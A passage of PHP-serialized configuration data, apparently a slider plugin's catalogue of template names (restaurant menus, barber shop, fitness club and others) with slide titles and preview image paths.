2\";s:3:\"img\";s:29:\"parallaxzoomslices/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"parallaxzoomslices/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"parallaxzoomslices/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"parallaxzoomslices/slide5.jpg\";}}s:20:\"doubleexposureeffect\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"doubleexposureeffect/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"doubleexposureeffect/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"doubleexposureeffect/slide3.jpg\";}}s:22:\"mountainparallaxheader\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"mountainparallaxheader/slide1.jpg\";}}s:12:\"goodnewsmenu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"goodnewsmenu/slide1.jpg\";}}s:14:\"goodnewsheader\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"goodnewsheader/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"goodnewsheader/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"goodnewsheader/slide3.jpg\";}}s:16:\"goodnewswhatshot\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"goodnewswhatshot/slide1.jpg\";}}s:16:\"goodnewsfeatured\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"goodnewsfeatured/slide1.jpg\";}}s:17:\"goodnewsspotlight\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"goodnewsspotlight/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"goodnewsspotlight/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"goodnewsspotlight/slide3.jpg\";}}s:16:\"goodnewscarousel\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"goodnewscarousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"goodnewscarousel/slide2.jpg\";}}s:15:\"goodnewscallout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"goodnewscallout/slide1.jpg\";}}s:14:\"goodnewsfooter\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"goodnewsfooter/slide1.jpg\";}}s:16:\"goodnewsmenuback\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"goodnewsmenuback/slide1.jpg\";}}s:18:\"goodnewsblogheader\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"goodnewsblogheader/slide1.jpg\";}}s:19:\"goodnewsblogcontent\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"goodnewsblogcontent/slide1.jpg\";}}s:20:\"goodnewstestimonials\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"goodnewstestimonials/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"goodnewstestimonials/slide2.jpg\";}}s:18:\"goodnewsblogfooter\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"goodnewsblogfooter/slide1.jpg\";}}s:17:\"beforeafterslider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"beforeafterslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"beforeafterslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"beforeafterslider/slide3.jpg\";}}s:15:\"productshowcase\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"productshowcase/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"productshowcase/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"productshowcase/slide3.jpg\";}}s:22:\"overexposuretransition\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"overexposuretransition/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"overexposuretransition/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"overexposuretransition/slide3.jpg\";}}s:14:\"parallaxscroll\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"parallaxscroll/slide1.jpg\";}}s:11:\"techco-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"techco-menu/slide1.jpg\";}}s:13:\"techco-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"techco-header/slide1.jpg\";}}s:12:\"techco-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"techco-about/slide1.jpg\";}}s:15:\"techco-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"techco-services/slide1.jpg\";}}s:12:\"techco-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"techco-video/slide1.jpg\";}}s:13:\"techco-prices\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"techco-prices/slide1.jpg\";}}s:19:\"techco-testimonials\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"techco-testimonials/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"techco-testimonials/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"techco-testimonials/slide3.jpg\";}}s:13:\"techco-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"techco-footer/slide1.jpg\";}}s:7:\"weather\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"weather/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"weather/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"weather/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:18:\"weather/slide4.jpg\";}}s:11:\"360panorama\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"360panorama/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"360panorama/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"360panorama/slide3.jpg\";}}s:14:\"duotone-add-on\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"duotone-add-on/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"duotone-add-on/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"duotone-add-on/slide3.jpg\";}}s:13:\"reveal-add-on\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"reveal-add-on/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"reveal-add-on/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"reveal-add-on/slide3.jpg\";}}s:16:\"band-tour-poster\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:40:\"smartcontent/band-tour-poster/slide1.png\";}}s:14:\"brewery-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"smartcontent/brewery-slider/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"smartcontent/brewery-slider/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:38:\"smartcontent/brewery-slider/slide3.png\";}}s:9:\"burgerbar\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"smartcontent/burgerbar/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"smartcontent/burgerbar/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"smartcontent/burgerbar/slide3.png\";}}s:19:\"burger-bar-portrait\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:43:\"smartcontent/burger-bar-portrait/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:43:\"smartcontent/burger-bar-portrait/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:43:\"smartcontent/burger-bar-portrait/slide3.png\";}}s:8:\"car-rent\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"smartcontent/car-rent/slide1.png\";}}s:6:\"coffee\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"smartcontent/coffee/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"smartcontent/coffee/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"smartcontent/coffee/slide3.png\";}}s:14:\"holiday-advert\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"smartcontent/holiday-advert/slide1.png\";}}s:18:\"iphone-cases-light\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:42:\"smartcontent/iphone-cases-light/slide1.png\";}}s:7:\"medical\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"smartcontent/medical/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"smartcontent/medical/slide2.png\";}}s:13:\"mexican-grill\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:37:\"smartcontent/mexican-grill/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:37:\"smartcontent/mexican-grill/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:37:\"smartcontent/mexican-grill/slide3.png\";}}s:20:\"mobile-retail-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:44:\"smartcontent/mobile-retail-slider/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:44:\"smartcontent/mobile-retail-slider/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:44:\"smartcontent/mobile-retail-slider/slide3.png\";}}s:14:\"money-exchange\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"smartcontent/money-exchange/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"smartcontent/money-exchange/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:38:\"smartcontent/money-exchange/slide3.png\";}}s:28:\"restaurant-menu-first-screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:52:\"smartcontent/restaurant-menu-first-screen/slide1.png\";}}s:29:\"restaurant-menu-second-screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:53:\"smartcontent/restaurant-menu-second-screen/slide1.png\";}}s:28:\"restaurant-menu-third-screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:52:\"smartcontent/restaurant-menu-third-screen/slide1.png\";}}s:11:\"shoes-store\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"smartcontent/shoes-store/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:35:\"smartcontent/shoes-store/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:35:\"smartcontent/shoes-store/slide3.png\";}}s:20:\"supermarket-products\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide3.png\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide4.png\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide5.png\";}}s:16:\"travel-insurance\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:40:\"smartcontent/travel-insurance/slide1.png\";}}s:12:\"cryptoslider\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"cryptoslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"cryptoslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"cryptoslider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"cryptoslider/slide4.jpg\";}}s:16:\"immersion_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"immersion_header/slide1.jpg\";}}s:19:\"immersion-mountains\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"immersion-mountains/slide1.jpg\";}}s:17:\"immersion-product\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"immersion-product/slide1.jpg\";}}s:16:\"immersion-design\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"immersion-design/slide1.jpg\";}}s:21:\"immersion-photography\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"immersion-photography/slide1.jpg\";}}s:14:\"immersion-grid\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"immersion-grid/slide1.jpg\";}}s:11:\"funkyslider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"funkyslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"funkyslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"funkyslider/slide3.jpg\";}}s:14:\"clearview_menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"clearview_menu/slide1.jpg\";}}s:16:\"clearview_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"clearview_header/slide1.jpg\";}}s:17:\"clearview_mission\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"clearview_mission/slide1.jpg\";}}s:17:\"clear-view-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"clear-view-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"clear-view-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"clear-view-slider/slide3.jpg\";}}s:15:\"clear-view-news\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"clear-view-news/slide1.jpg\";}}s:18:\"clear-view-clients\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"clear-view-clients/slide1.jpg\";}}s:18:\"clear-view-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"clear-view-contact/slide1.jpg\";}}s:22:\"clear-view-single-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"clear-view-single-menu/slide1.jpg\";}}s:24:\"clear-view-single-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"clear-view-single-header/slide1.jpg\";}}s:23:\"clear-view-single-media\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"clear-view-single-media/slide1.jpg\";}}s:22:\"clear-view-single-more\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"clear-view-single-more/slide1.jpg\";}}s:25:\"clear-view-single-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"clear-view-single-contact/slide1.jpg\";}}s:16:\"cleanlandingpage\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"cleanlandingpage/slide1.jpg\";}}s:8:\"clearcut\";a:10:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:19:\"clearcut/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:19:\"clearcut/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:19:\"clearcut/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:19:\"clearcut/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:19:\"clearcut/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:19:\"clearcut/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:19:\"clearcut/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:19:\"clearcut/slide8.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:19:\"clearcut/slide9.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:20:\"clearcut/slide10.jpg\";}}s:17:\"wonderstruck_menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"wonderstruck_menu/slide1.jpg\";}}s:19:\"wonderstruck_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"wonderstruck_header/slide1.jpg\";}}s:18:\"wonderstruck_about\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"wonderstruck_about/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"wonderstruck_about/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"wonderstruck_about/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"wonderstruck_about/slide4.jpg\";}}s:18:\"wonderstruck-works\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"wonderstruck-works/slide1.jpg\";}}s:20:\"wonderstruck-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"wonderstruck-contact/slide1.jpg\";}}s:11:\"bubblemorph\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"bubblemorph/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"bubblemorph/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"bubblemorph/slide3.jpg\";}}s:15:\"distortionaddon\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"distortionaddon/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"distortionaddon/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"distortionaddon/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"distortionaddon/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"distortionaddon/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:26:\"distortionaddon/slide6.jpg\";}}s:9:\"clubflyer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"clubflyer/slide1.jpg\";}}s:15:\"paintbrushaddon\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"paintbrushaddon/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"paintbrushaddon/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"paintbrushaddon/slide3.jpg\";}}s:15:\"parallax_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"parallax_header/slide1.jpg\";}}s:16:\"parallax_content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"parallax_content/slide1.jpg\";}}s:15:\"parallax_footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"parallax_footer/slide1.jpg\";}}s:12:\"le-chef-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"le-chef-menu/slide1.jpg\";}}s:14:\"le-chef-header\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"le-chef-header/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"le-chef-header/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"le-chef-header/slide3.jpg\";}}s:18:\"le-chef-philosophy\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"le-chef-philosophy/slide1.jpg\";}}s:12:\"le-chef-food\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"le-chef-food/slide1.jpg\";}}s:16:\"le-chef-la-carte\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"le-chef-la-carte/slide1.jpg\";}}s:14:\"le-chef-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"le-chef-footer/slide1.jpg\";}}s:20:\"news-magazine-slider\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"news-magazine-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"news-magazine-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"news-magazine-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:31:\"news-magazine-slider/slide4.jpg\";}}s:18:\"real-estate-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"real-estate-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"real-estate-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"real-estate-slider/slide3.jpg\";}}s:14:\"fashion-header\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"fashion-header/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"fashion-header/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"fashion-header/slide3.jpg\";}}s:13:\"seasonaloffer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"seasonaloffer/slide1.jpg\";}}s:18:\"barber-shop-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"barber-shop-header/slide1.jpg\";}}s:23:\"barber-shop-mobile-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"barber-shop-mobile-menu/slide1.jpg\";}}s:24:\"barber-shop-first-screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"barber-shop-first-screen/slide1.jpg\";}}s:17:\"barber-shop-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"barber-shop-about/slide1.jpg\";}}s:20:\"barber-shop-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"barber-shop-services/slide1.jpg\";}}s:19:\"barber-shop-barbers\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"barber-shop-barbers/slide1.jpg\";}}s:20:\"barber-shop-contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"barber-shop-contacts/slide1.jpg\";}}s:18:\"barber-shop-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"barber-shop-footer/slide1.jpg\";}}s:21:\"fitness-club-template\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"fitness-club-template/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"fitness-club-template/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"fitness-club-template/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"fitness-club-template/slide4.jpg\";}}s:13:\"soccer-school\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"soccer-school/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"soccer-school/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"soccer-school/slide3.jpg\";}}s:19:\"music-band-template\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"music-band-template/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"music-band-template/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"music-band-template/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:30:\"music-band-template/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 